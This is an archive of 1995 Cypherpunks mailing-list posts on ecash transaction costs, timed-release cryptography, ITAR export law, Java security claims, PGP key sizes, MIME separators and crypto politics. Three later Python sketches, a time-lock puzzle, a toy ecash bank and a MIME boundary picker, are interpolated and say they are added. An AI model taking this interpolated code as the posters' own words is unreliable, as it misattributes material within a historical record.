From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 05:45:43 +0800
To: cypherpunks@toad.com
Subject: Market Value of Web Pages
Message-ID: <acc79e46010210045c32@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:51 PM 11/9/95, Bill Frantz wrote:

>BTW - I don't think we should be talking about a penny/page cost because it
>is way too high for the current market.  For example, my copy of Applied
>Cryptography V2 cost about $.067/page AND came with the media to keep it
>"forever".  My (used) copy of Snow Crash cost closer to a penny/page and
>also came with the media.  I would think that somewhere between 1/100 to
>1/10 of a penny/page is closer to the current market value of the page
>content.

With all due respect to Bill--his mention of agorics tells me he knows
something about computational ecologies and markets--, there is no
reasonable way to say what price is "closer to the current market value of
the page content," except by what the market will bear!

Yes, a paperback novel is a penny a page or so. But a 5-page consultant's
report that sells for $2000 has a "market value" to someone of $400 a page.
You can all think of all kinds of other examples.

Closer to home, a copy of "Penthouse" which sells for $5 and which has
perhaps 10 photographs of "interest" to someone can be said to roughly have
a value of $.50 per Web page of equivalent material. "Penthouse" and
"Playboy," to name just two examples, have "members only" Web pages, and
they are apparently doing OK financially. (Other "members only" Web pages
may also be doing well....it is _these_ Web pages that provide an example
of paid access in contrast to the some other examples, where even a
fraction of a cent per page is too much.)

Personally, I've yet to pay for a Web page. Too much "free" stuff, too much
stuff coming out of the firehose. (And a lot of JPEGs from the "members
only" page are being "liberated" and posted--often through remailers--to
the alt.binaries.pictures.* "free" newsgroups, or placed on other Web
pages.)

I expect this to someday change, and to pay for some things at a fraction
of a cent per hit, some other things for a few cents a hit, and maybe even
some things at dollars per hit.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 05:33:34 +0800
To: cypherpunks@toad.com
Subject: Re: Timed-release crypto and information economics
Message-ID: <acc7a170020210041a84@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:52 PM 11/9/95, Beavis B. Thoopit wrote:
>> That's a pretty large number of assumptions:
>>
>>       tamper-proof delay line
>>       => tamper-proof crypto box ("transformation function with state")
>>       => tamper-proof delay line
>>
>> Why not just put a tamper-proof clock in the tamper-proof crypto box
>> and not bother with the delay lines?
>
>The tamper proof aspect is really secondary to the math question.
>The idea that if I set up a stream of bits through a transform, that
>the original state of the transform affects the final outcome after
>N iterations.

The tamper-proof (more correctly, "tamper-resistant" or
"tamper-responding") hardware is so that attackers do not alter the clocks,
as one example, to "speed up" the time release. Or grab the key, as another
example.

(Cranking up the clock speed may or may not be possible and still have the
device work, but it's still an attack to consider.)

If the attacker can grab the internal state of the device, he can of course
run the "transform" talked about above on his equipment.

>If the transform exists, it will ease/eliminate the reliance on the
>"economics" of cryptography to build a tamper-proof physical device.

You'll need to more carefully argue your thesis. I cannot imagine a method,
save perhaps for quantum computing techniques, which can avoid the need for
"secure secrets," either via a person keeping a secret or a box keeping a
secret.

If the box is not secure against tampering, and an attacker gets in, he
effectively "knows" all of the secrets.

BTW, the "launch into solar orbit" scheme that has again surfaced here is
just a variant of making the costs of an attack very high.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 05:54:39 +0800
To: cypherpunks@toad.com
Subject: Re: ecash speed
Message-ID: <acc7a3f604021004b22d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:21 PM 11/9/95, jim bell wrote:

>The problem:  How do you pay, say, 1/10th of a penny for a good or service
>if the minimum denominated coin is a penny?   This is important, because as
>we all know the cost of providing computer services of all kinds (and data
>transmission) can be expected to continue to drop as time progresses.   If
>we allow the minimum size coin to control our lives, it will keep prices
>higher than they ought to be and prevent low-cost services from existing.

A non-problem.

Ask any business whether the "minimum denominated coin" is a penny. Perhaps
the minimum denominated _coin_ is a penny, in the U.S., but vast numbers
of widgets are priced at sub-cent levels.

True, no purchase orders are written for sub-cent prices, but this is a
transaction cost issue, not something basic to the currency. (Likewise,
Hal's concerns about ecash speed are basically transaction cost issues.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Beavis B. Thoopit" <beavis@bioanalytical.com>
Date: Fri, 10 Nov 1995 03:37:30 +0800
To: sommerfeld@orchard.medford.ma.us (Bill Sommerfeld)
Subject: Re: Timed-release crypto and information economics
In-Reply-To: <199511091621.QAA01045@orchard.medford.ma.us>
Message-ID: <199511091852.NAA01172@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


> That's a pretty large number of assumptions:
> 
> 	tamper-proof delay line
> 	=> tamper-proof crypto box ("transformation function with state")
> 	=> tamper-proof delay line
> 
> Why not just put a tamper-proof clock in the tamper-proof crypto box
> and not bother with the delay lines?

The tamper proof aspect is really secondary to the math question.
The idea that if I set up a stream of bits through a transform, that
the original state of the transform affects the final outcome after
N iterations.

If the transform exists, it will ease/eliminate the reliance on the
"economics" of cryptography to build a tamper-proof physical device.

Here is another implementation of the idea:

initialize buffer to '12#fjKL3_*(ASDdj1ll3_13 asdfasd-1-3!#!23'
do forever      /* actually until the plaintext spews out */
  sleep 1 unit
  for each element in the buffer
    buffer[ element ] = magictransform( buffer[ element ] )

The initial buffer must be secret!

Calculating the initial buffer in such a way that after N iterations
the plaintext message appears is what must happen.
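
One known construction with the property asked for above is the Rivest-Shamir-Wagner time-lock puzzle, published after this thread; the sketch below is an added example, not code from the post. Here "magictransform" is squaring modulo n, the starting state is public, and the secret is the factorization of n rather than the initial buffer; the modulus, function names and SHA-256 pad are assumptions made for the demo.

```python
import hashlib
from math import gcd

# Constructed demo modulus: two well-known Mersenne primes. Far too small and
# too structured for real use; a real puzzle needs a large random RSA modulus.
P = 2**61 - 1
Q = 2**89 - 1


def keystream(state: int, length: int) -> bytes:
    """Stretch the final state into `length` pad bytes (SHA-256 in counter mode)."""
    seed = state.to_bytes((state.bit_length() + 7) // 8 or 1, "big")
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def xor(data: bytes, pad: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(data, pad))


def iterate(state: int, rounds: int, n: int) -> int:
    """Slow path: `rounds` squarings, each one needing the previous result."""
    for _ in range(rounds):
        state = state * state % n
    return state


def make_puzzle(message: bytes, rounds: int, start: int = 3,
                p: int = P, q: int = Q) -> dict:
    """Creator's side: knows p and q, so it skips the iteration entirely."""
    n = p * q
    if gcd(start, n) != 1:
        raise ValueError("start must be coprime to n")
    phi = (p - 1) * (q - 1)
    # Trapdoor (Euler): start^(2^rounds) mod n == start^(2^rounds mod phi) mod n
    final = pow(start, pow(2, rounds, phi), n)
    return {"n": n, "start": start, "rounds": rounds,
            "ciphertext": xor(message, keystream(final, len(message)))}


def solve_puzzle(puzzle: dict) -> bytes:
    """Everyone else: no factorization, so run every iteration in sequence."""
    final = iterate(puzzle["start"], puzzle["rounds"], puzzle["n"])
    return xor(puzzle["ciphertext"], keystream(final, len(puzzle["ciphertext"])))


if __name__ == "__main__":
    puzzle = make_puzzle(b"the plaintext spews out", rounds=20000)
    print(solve_puzzle(puzzle))
```

The delay is counted in sequential squarings, not wall-clock time, so it shrinks as the solver's hardware gets faster.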




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 10 Nov 1995 03:43:29 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Pegasus Mail
In-Reply-To: <199511091528.HAA05703@jobe.shell.portal.com>
Message-ID: <m0tDc9b-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:

: One
: of the elements of the offense of violating the arms export control act
: is that the violation be willful.  The exporter has to violate a known
: legal duty not to export the item.  One of the reasons for this is simply
: that the ITAR list is long and technical and average individuals cannot be
: expected to know all its details.  This is mentioned in the Lizarraga
: case, at approximately 541 F2d 828:

  . . . .
 
: So in this case I think widespread publicity about the ITARs can be
: considered harmful.  All those helpful people going around warning others
: that they are exporting software are actually removing a defense against
: charges of export.

This is a serious problem.  On the other hand there are civil penalties
for violating the ITAR that can be imposed without any showing of
willfulness.  So the non-willful exporter is still at risk, even if he
does not know it.  And if people are not informed in general, then the
boys from the Office of Defense Trade Controls and NSA, can selectively
inform only those whom they wish to harass, which is perhaps the
nastiest aspect of the ITAR.

The only long term solution is to establish that the ITAR's provisions
relating to cryptographic software are unconstitutional and void.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Date: Fri, 10 Nov 1995 03:47:44 +0800
To: cypherpunks@toad.com
Subject: Re: (cpx) Re: ecash speed
In-Reply-To: <v02120d03acc7c8d9c381@[199.0.65.105]>
Message-ID: <Pine.SUN.3.91.951109140743.26577A-100000@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


There is certainly no need for an extra connection from the merchant back
to the customer.  See draft-eastlake-internet-payment-00.txt.

Donald (not on cypherpunks)

On Thu, 9 Nov 1995, Robert Hettinga wrote:

> 
> --- begin forwarded text
> 
> Date: Wed, 8 Nov 1995 21:08:51 -0800
> From: Hal <hfinney@shell.portal.com>
> To: cypherpunks@toad.com
> Subject: Re: ecash speed
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
> "Perry E. Metzger" <perry@piermont.com> writes:
> 
> >Hal writes:
> >> The point is that if the anonymity afforded by ecash is too costly in
> >> terms of time, then we may end up stuck with a non-anonymous system
> >> simply because that is the only one efficient enough to work.  It would
> >> be good to find out if that is a serious problem.
> 
> >I suspect that as CPU speed exponentiates this will become less and
> >less of a problem. It doesn't especially worry me.
> 
> Consider, though, what happens in the current ecash system if it were
> used to charge a penny per page.  You would click on a link in your web
> browser to go to the new page.  It would set the GET request to the
> remote server as usual.
> 
> The server would fire up a CGI script which will run the shop software.
> That software will make a TCP stream connection back to your ecash wallet
> software which is running on the system where your client is.  It sends a
> request to get paid $.01.  Assuming the wallet is configured to
> automatically approve such a payment, it will send a one penny coin to
> the shop software along the opened link.  (This may also involve doing a
> PK encryption on the coin as an anti-theft measure; this aspect of the
> current ecash system is not documented AFAIK.)
> 
> The shop software then opens a TCP stream connection to the bank, and
> forwards the coin there.  The bank receives it, and checks the public
> key signature in the coin.  It then compares the coin against every other
> coin which has ever been spent (within the validity period of the coin)
> to make sure it is not being doubly spent.  If this all checks out it
> sends back some authentication message to the original server.  The shop
> software then delivers the new page to the client browser.
> 
> This all has to happen whenever you click on a link in your browser.
> Even with fast CPU's I think the extra step of connecting to the bank,
> having it check against all coins, and getting approval will be
> considerable for each link traversal.
> 
> Hal
> --- end forwarded text
> 
> 
> -----------------
> Robert Hettinga (rah@shipwright.com)
> Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
> USA (617) 323-7923
> "Reality is not optional." --Thomas Sowell
> >>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<
> 
> 
> 

=====================================================================
Donald E. Eastlake 3rd     +1 508-287-4877(tel)     dee@cybercash.com
   318 Acton Street        +1 508-371-7148(fax)     dee@world.std.com
Carlisle, MA 01741 USA     +1 703-620-4200(main office, Reston, VA)
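
The bank-side step in the forwarded description above (check the bank's signature on the coin, then check it against coins already spent within the validity period), as an added sketch that is not DigiCash's or CyberCash's code. The coin layout and names are assumptions, and an HMAC under a bank-only key stands in for the public-key signature, so this shows the deposit check only, not blinding or anonymity.

```python
import hashlib
import hmac
import secrets


class Bank:
    """Toy online-clearing bank: issues coins and rejects double spends."""

    def __init__(self, key: bytes = None):
        self._key = key or secrets.token_bytes(32)  # known only to the bank
        self._spent = {}                            # serial -> expiry time

    def _tag(self, serial: bytes, value: int, expiry: int) -> bytes:
        # Fixed-width fields, so the concatenation is unambiguous.
        msg = serial + value.to_bytes(4, "big") + expiry.to_bytes(8, "big")
        return hmac.new(self._key, msg, hashlib.sha256).digest()

    def issue(self, value: int, now: int, validity: int) -> dict:
        serial = secrets.token_bytes(16)
        expiry = now + validity
        return {"serial": serial, "value": value, "expiry": expiry,
                "sig": self._tag(serial, value, expiry)}

    def deposit(self, coin: dict, now: int) -> str:
        expected = self._tag(coin["serial"], coin["value"], coin["expiry"])
        if not hmac.compare_digest(coin["sig"], expected):
            return "bad-signature"
        if now >= coin["expiry"]:
            return "expired"
        # One hash-table lookup, not a scan over every coin ever spent.
        if coin["serial"] in self._spent:
            return "double-spend"
        self._spent[coin["serial"]] = coin["expiry"]
        return "ok"

    def prune(self, now: int) -> int:
        """Forget serials past their expiry; deposit() already rejects those coins."""
        expired = [s for s, e in self._spent.items() if e <= now]
        for serial in expired:
            del self._spent[serial]
        return len(expired)


if __name__ == "__main__":
    bank = Bank()
    penny = bank.issue(value=1, now=1000, validity=3600)
    print(bank.deposit(penny, now=1001), bank.deposit(penny, now=1002))
```

The validity period is what bounds the spent-coin table: a serial can be dropped once its coin could no longer be accepted anyway.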




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 10 Nov 1995 07:01:44 +0800
To: Moroni <moroni@prufrocks.scranton.com>
Subject: Re: Exporting software doesn't mean exporting
In-Reply-To: <Pine.LNX.3.91.951109163123.5118A-100000@prufrocks.scranton.com>
Message-ID: <Pine.ULT.3.91.951109140853.9570A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Nov 1995, Moroni wrote:

>    Where can one get a copy of ITAR ? Secondly , has anyone written any 
> books on the subject and if so who and what?

I believe ITAR is 22 USC $ 2278 and environs, which should be at
http://www.law.cornell.edu/uscode/22/2778.html. I can't quote from it
right this second because there seems to be a routing problem inside
sprintlink (must be SAIC censoring us).

Books, I dunno.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Mon, 13 Nov 1995 20:53:48 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Information Resource Engineering Inc.
Message-ID: <Pine.HPP.3.91.951109141848.26057C-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm looking for information about encryption products made by this company.
Any pointers will be appreciated.

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation of government agency>."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 10 Nov 1995 07:32:01 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: Many Topics are Appropriate for Discussion Here
In-Reply-To: <199511092020.MAA28155@jobe.shell.portal.com>
Message-ID: <199511092229.OAA05862@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Is Steve AT&T's Security Officer or something?  He never really introduced
> himself when he emailed me, and he never presented me with any credentials
> or letters of introduction.  But if he is so well known (news to me), and
> has a well known reputation -- probably a reputation on a par with noted
> international electro-virologist, "Dr. Frederick B. Cohen" -- then he's
> probably a very busy fellow. 


	Steve's reputation is not on par w/Dr Fred's. Steve is
actually respected. I will refrain from commenting on Dr. Fred's
reputation. ("If you don't have anything nice to say...")

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 10 Nov 1995 07:41:11 +0800
To: cypherpunks@toad.com
Subject: Re: Java insecurity - long - argumentative - you are warned.
Message-ID: <199511092241.OAA14102@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Nov 1995, Ray Cromwell wrote:

> > WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
> > A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!
> > 
> > >From the Java Web pages (as combined in Firewalls/BoS):
> > 
> > > The language's security features (not just applets):
> 
> [Long list of bullshit deleted]

I don't think that this is *bullshit* ... the questions I mean ... but,
I for one am tired of people promoting products in a manner which flies 
in direct contravention of expert consensus.

No one would accept a pharmaceutical company that says a product is X, 
if it is in fact Y.  And no one would question if a researcher came 
forward, and corrected the company and set the record straight.

This is generally called ETHICS ... not bullshit.  The problem is not in 
the messenger, it's in the organization that is simply willing to 
roll the dice when it comes to public safety and security.

>  "Dr" Cohen. If you want to criticize Java, why not read the technical
> papers rather than spewing questions and assertions based from ignorance.

I've got a better suggestion.  Why don't companies like Sun ensure 
that their sales and technical material is reviewed for gross 
inaccuracies and/or misrepresentations?

> When you want to criticize a piece of engineering, you don't look
> at the feature list or white paper. As is made clear in your post,
> you don't know the meanings of phrases used in the Java paper, nor do
> you understand how the machinery works. (e.g. byte code verifier)

I won't speak for Dr. Frederick B. Cohen, but I will speak for myself,
and provide this list with but a single example.  And I won't quote
from a white paper, but will instead quote from some Sun literature
which crossed my desk the day before yesterday, literature that Sun
provided as part of their worldwide introduction of Ultra workstations.

What they called a "breakthrough for network computing".

What follows is not "technical commentary", but is simply what they
provide as information to MIS managers, Sun resellers and invited
press. This copyrighted brochure, which looks like it was printed
11/95 makes the following verbatim comment on the "Java Internet
Application Language".

> Java has an extensive library of routines for coping with TCP/IP 
> protocols such as HTTP and FTP.  Java applications can open and access 
> objects across the net via URLs with the same ease that programmers are 
> used to when accessing a local file system.
>
> Java is intended to be used in networked/distributed environments.  
> Therefore, much emphasis has been placed on security.  The product 
> enables programmers to create virus-free, tamper-free systems through 
> public-key encryption authentication techniques.

Hmmm, maybe I'm confused, but this is grossly overselling a product's
capabilities, and is setting absolutely unrealistic expectations --
expectations which are doomed from the start never to be met, let
alone exceeded.  This expectations/satisfaction gap will ultimately
lead to customer dis-satisfaction.

Then again ... the solution to virus-free, tamper-free systems with
TCP/IP protocol "coping" has always been a problem that's been waiting
for a "product solution" to help all of us to enable our programmers.

God help us all.

As part of my copious spare time, I might make a personal comment
which hopefully gets to some of the powers that be at Sun.

Firstly, I wasn't aware that HTTP was a TCP/IP protocol.  I didn't
even think that there was a draft RFC on it.  I thought that all that
there was, was an internet-draft, which is a different kettle of fish.
I never realized that HTTP was on standards track, and part of the
application protocol.  It really is news to me.  But that's a quibble,
and I'm really behind on my reading, so, I could be wrong.

My second comment is perhaps more actionable.  I would much rather
that a product clearly and definitively state what it has implemented.
Maybe something like the following.

Implementation of the following IETF (Internet Engineering Task Force)
protocols :IP (RFCs 791, 894; MIL-STD 1777); UDP (RFC 768); TCP (RFC
793, MIL-STD 1778); ARP (RFC 826); RARP (RFC 903); ICMP (RFC 792);
BootP (RFCs 951, 1048); RIP (IDEA004); DNS (RFCs 1034, 1035); Internet
Subnetting (RFC 950); and Internet Assigned Numbers (RFC 1010). Maybe,
also that the product complies with Requirements for Internet Hosts
Communications Layers (RFC 1122) and with A Standard for the
Transmission of IP Datagrams over IEEE 802 Networks (RFC 10..
something or other).

This is far more informative (ironically) than saying that:

> Java has an extensive library of routines for coping with TCP/IP
> protocols such as HTTP and FTP.

Hmmm, FTP.  That's RFC 7?? or something like that, isn't it?? 

As an example, I'd like to know how Java handles a file, that is called
foo.bar.au.  Does a .au file refer to an audio file, or does it refer to
something from Australia??  

I'll stop here, and not continue with my deconstruction, especially
the part that continues:

> Java is intended to be used in networked/distributed environments.
> Therefore, much emphasis has been placed on security.  The product
> enables programmers to create virus-free, tamper-free systems through
> public-key encryption authentication techniques.

To every problem, a product solution ... we can leave mathematicians
at the door, and simply enable our programmers.

Those technical analyst rocket scientist types, really can't know
anything, at all.  Can they?



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.


P.P.S. To Sun:   I was also a bit disappointed that nobody thought to 
       show what a vice-presidential tribble looks like on satellite 
       simulcast ... then again, I was thrilled with the female 
       "trader" who spoke about patterns in chaotic systems to her 
       cab driver.  

       Did she work the back office at Daiwa, or something??  Probably 
       believes in runs of luck, too ...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 10 Nov 1995 04:32:17 +0800
To: Raph Levien <raph@cs.berkeley.edu>
Subject: Re: Small keysizes do make sense (was PGP Comment weakens...)
In-Reply-To: <199511091725.JAA17620@kiwi.cs.berkeley.edu>
Message-ID: <199511091951.OAA15564@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Raph Levien writes:
> > On the other hand, it costs nothing by most people's standards to use
> > a 1024 bit key, so why not use one? I find that there is only a point
> > in using low security for anything in particular when there is a
> > perceivable cost to it -- if the cost is typing a different number
> > while doing key generation, I don't see why one should suffer the
> > tradeoff.
> 
> Perhaps it costs you "nothing," Perry, but not all of us have the
> massively parallel 64-way interleaved banked memory nanosecond-latency
> box you have on your desk.

I've found that in practice the compression pass takes longer than the
RSA pass for PGP. If you accept the time for the file compression I
don't see how you can have trouble with the 1024 bit RSA operation.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Thu, 9 Nov 1995 22:15:26 +0800
To: Raph Levien <raph@CS.Berkeley.EDU>
Subject: Mime/multipart (was Re: PGP Comment feature weakens remailer security)
In-Reply-To: <199511080454.UAA05765@jobe.shell.portal.com>
Message-ID: <9511091356.AA09725@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Raph Levien writes:
 >    On an unrelated topic... cypherpunks like to count bits, right?
 > What is the correct number of pseudorandom bits to use in a MIME
 > multipart separator? If the data has a line which matches the
 > separator, the message is corrupted. Of course, if you can take
 > multiple passes through the data, you can simply verify that it does
   ***************
No need !
 > not contain a line which matches the separator. But if you're
 > restricted to a single pass, then the only way to do it is to use a
 > randomly generated separator.
I've waited a bit, but as nobody seems to have pointed out, you can
definitely find a unique stream in a *single* pass (but maybe what you
really want is no pass at all ?)
{you add a new random byte each time you find your sequence in the
stream, and go forward (as the previous separator was not in the
"past" of the stream, you don't need to go back)}

What am I missing ? (anyway, see below)
(I hope my answer is not as clueless as the "A-dice anonymous" one)

 >    I figure that 128 bits should _definitely_ be enough (that's what
 > is in the new premail code now). Even 64 bits should ensure that it is
 > unlikely that anyone will ever experience message corruption over the
 > expected lifetime of premail. However, it makes me nervous. What do
 > people think?

Isn't PGP encoded stream containing only base64 chars ? Why not use
"====PGP part #===="  (as you can't have more than 2 = in a base 64,
and only at the end anyway)
or "@PGP part #" or whatever starting with a non base64 char ?

so "@" = 8 bits is my answer, do I win ;-) ?

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Greenpeace Uzi NORAD DES NSA [Hello to all my fans in domestic
 surveillance] Clinton
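
The single-pass idea in the message above (extend the separator each time it turns up in the stream, never going back), as an added sketch that is not premail's code. It assumes body lines arrive without line terminators, treats any line beginning with "--" plus the separator as a collision, and uses hypothetical names throughout.

```python
import secrets
import string

# A subset of the characters RFC 2046 allows in a boundary.
BCHARS = string.ascii_letters + string.digits
MAX_BOUNDARY = 70  # RFC 2046 length limit for a boundary


def pick_boundary(lines, seed="part", choose=secrets.choice):
    """Return (boundary, extensions) after one forward pass over `lines`.

    Invariant: no line consumed so far starts with "--" + boundary. Every
    new boundary has the old one as a prefix, so lines already passed, which
    did not start with the shorter boundary, cannot start with the longer one.
    """
    boundary = seed
    extensions = 0
    for line in lines:
        prefix = "--" + boundary
        if not line.startswith(prefix):
            continue
        if len(boundary) >= MAX_BOUNDARY:
            raise ValueError("boundary would exceed 70 characters")
        # Character that follows the match on this line ("" at end of line).
        # Excluding it guarantees this same line no longer matches.
        following = line[len(prefix):len(prefix) + 1]
        boundary += choose([ch for ch in BCHARS if ch != following])
        extensions += 1
    return boundary, extensions


if __name__ == "__main__":
    # Constructed body in which several lines try to mimic the separator.
    body = ["text", "--part", "--partQ", "more text"]
    print(pick_boundary(iter(body)))
```

Because the final separator is only known once the pass ends, the multipart header naming it has to be written after the body has been scanned or buffered.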




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 10 Nov 1995 08:03:09 +0800
To: cypherpunks@toad.com
Subject: Gingrich, "crypto coalition" & dysfunctional philosophy
In-Reply-To: <199511091637.RAA06491@utopia.hacktic.nl>
Message-ID: <199511092308.PAA18692@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



From: nobody@REPLAY.COM (Anonymous)
>The gov't may well lose this fight eventually, but a few heads are gonna
>get broken before either side wins. This fight is playing itself out on
>the level of policy now, but it's much bigger than a policy issue. And the
>"revolution" of Newt and his legions of weenies (I say nothing of Clinton
>and his legions of weenies) is bullshit: he's an empty opportunist who's
>riding a fractious coalition that'll make Clinton look like a libertarian
>if it ever gets control of the country. And right now he's cluing in to
>the fact that he can score some points on encryption issues: he's got his
>eye on the snowballing WiReD coalition, which *no one* knew existed until
>a few years ago.

a short comment on Gingrich: I think he is one of the few politicians with
balls enough to make tough choices such as budget cutting. of course people
detest someone like him. he has horrible approval ratings in the single
digits. people would rather have politicians lie to them that no tough 
choices are necessary in the future, or that if any are, all the 
grandmothers in the country will be conveniently exempted. I don't see 
Gingrich at all as an opportunist in the sense of Clinton, i.e. someone 
who has no intrinsic moral compass
that governs his decisions and positions on issues. to the contrary Gingrich
has definite convictions on various issues. he is willing to compromise
on them frequently to get a consensus, however.

but my main point in writing was that I thought I would highlight this 
phrase given to us by A.Nonymous: the "crypto coalition".
or it might be called the "computer coalition". I think I see a few
faint glimmerings of a new political movement, potentially.
the recent Washington Times editorial on the Exon pornography law,
encryption, and the superiority of allowing people to develop tools
to screen what they don't want to so, could be considered a
portrayal of some of the key philosophies.

its very interesting to contemplate that the online crowd could become
a more well-organized political coalition that has influence in politics.
its clear to me this is happening weakly and informally at the moment.
(i.e. people on the internet having similar philosophies, hence voting
with the same aims, although not organizing to do so yet).
a key ingredient I see working against this:

the "coalition" has a lot of libertarian sentiments, and libertarians
tend to be anti-government and almost disdainful of even participating
in politics.

one might differentiate between cybernauts who are interested in reforming
our government and using the Net as a tool to do so, such as Jim Warren, and
people at the opposite end of the spectrum of "participation" such as
TCM, who seem to advocate that political battles be simply rejected
or ignored as irrelevant to the future of "cryptoanarchy". (although recent 
noises of his I quoted were distinctly uncharacteristic.)

if anyone is going to have influence in politics, it would be the former
type. but at least in the places in cyberspace where I hang out, I tend
to see more of the latter type: extremist libertarians who almost seem
to suggest that government is inherently unclean and dirty, no matter
what form it takes. I think these are the types that would hate a
government and advocate disenfranchisement with it no matter what 
direction it took, even if a libertarian was
elected to a powerful office. (its an interesting question to contemplate).

it seems to me to be largely a philosophy of alienation bordering
on nihilism.

now, I have been trashed in public for this position before, but the
philosophy of "us vs. them" applied to government in my opinion is the
wrong paradigm and only contributing to the problems, imho. an organized
"cyberspace coalition" could have tremendous political power to the point
that all the key annoying laws (such as the Itar etc.) actually become
election issues brought into mainstream consciousness. the editorials
I have seen about the Exon amendment etc. are steps in those directions.

I've seen TCM argue on this list against this, such that we should just
give up on telling congress what is important to us etc.  it was a position
that was not unanimous, and in fact quite controversial however, and 
remarkably PM once argued against it. (heh. love the fireworks on this list.
they are quite unpredictable at times).

I'm all for replacing a dysfunctional government. but people here seem
to advocate that this happens automatically when one has certain 
technology.

there is a whole other approach to "cryptoanarchy" that no one here
has ever suggested, but which could be tremendously effective: "infiltrate"
political positions with people sympathetic to that philosophy, and work
to change the entire structure toward it. "infiltrate" is a scary word,
but IMHO nothing any different than demopublicans appointing demopublicans
to office would be going on.

a very interesting, key quote by someone here went to the effect: "if
TCM is right, nothing the government does matters. if TCM is wrong, 
nothing we do matters". a fascinating psychological justification for
a sort of nihilism. but at the root of it is a kind of laziness and
hostility to organization or groups in any form, IMHO.

in fact the libertarian extremists here seem not only to hate government,
they seem to hate the whole idea of groups accomplishing things, about
the idea of groups coming to consensus. this is a quite remarkably
cynical ideology.

I'm going to make a prediction: I think the people who are interested
